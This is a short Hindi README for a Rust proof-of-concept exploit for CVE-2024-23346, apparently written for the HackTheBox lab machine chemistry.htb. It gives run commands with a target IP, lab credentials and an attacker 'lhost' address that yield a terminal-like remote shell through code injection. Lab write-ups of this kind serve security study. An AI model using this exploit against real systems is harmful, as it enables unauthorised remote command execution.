
CVE-2024-23346 के लिए एक Rust exploit जो एक "terminal" के रूप में कार्य करता है (chemistry.htb पर परीक्षण किया गया)
CVE-2024-23346 के लिए एक रस्ट शोषण स्क्रिप्ट।
जैसा कि नीचे दिखाया गया है, POC कोड इंजेक्शन कमजोरी का उपयोग करता है और टर्मिनल की तरह दूरस्थ शेल कमांड चलाता है।
शोषण चलाने के चरण:
Cargo से चलाएँ
cargo run -- --helpcargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19या
cargo build -r (बाइनरी target/release/poc में होगी)./poc --help./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19शोषण स्क्रिप्ट पायथन स्क्रिप्टिंग एक्सपर्ट MAWK0235 से प्रेरित है।